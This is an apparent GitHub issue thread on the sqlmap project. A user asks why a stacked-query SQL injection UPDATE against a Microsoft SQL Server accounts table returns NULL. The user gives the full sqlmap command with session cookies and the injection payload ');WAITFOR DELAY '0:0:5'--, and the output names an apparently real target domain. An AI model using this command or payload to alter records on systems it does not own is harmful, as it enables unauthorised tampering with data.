### ISSUE TITLE
Sqlmap stacked query UPDATE returns Null;

### ISSUE THREAD

**Issue by monarkmodi** [sqlmapproject/sqlmap#2247]
Hi,

So I am trying to UPDATE entry as the server being used is Microsoft SQL Server and it supports Stacked Queries. I was able to dump the entries but the UPDATE query does not work. It returns NULL so I am not sure if there is any issue with Privileges of the db. I was able to use SELECT but update does not work. Here is what I did:

`python sqlmap.py -u http://www.target.com/get?ID= --cookie="_ga=2480840.347987; ASP.NET_SessionId=jfjk380239jkdi56" -D AccountsInfo --sql-query "UPDATE AccountView SET Name='adminadmin' WHERE UserName='admin123';" --technique=S`

And the output happened to be: 

````
[*] starting at 20:27:16

[20:27:17] [WARNING] provided value for parameter 'ID' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[20:27:17] [INFO] resuming back-end DBMS 'microsoft sql server' 
[20:27:17] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ID (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ID=');WAITFOR DELAY '0:0:5'--
---
[20:27:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2016
UPDATE AccountView SET Name='adminadmin' WHERE UserName='admin123':    'NULL'
[20:27:18] [INFO] fetched data logged to text files under '/Users/pc/.sqlmap/output/www.lcexch.com'

[*] shutting down at 20:27:18
````

I have no idea what is causing this and how can I go about to Update the value. Would appreciate any kind of response. Thanks!

**Comment by stamparm** [comment]
UPDATE is not SELECT

**Comment by monarkmodi** [comment]
I did not get that. I believe this is Stack Query vulnerable as I did not get any warning regarding that. Also, I have the 'sa' user privilege. Why won't it UPDATE then?

**Comment by bitcoinboom** [comment]
did it work?
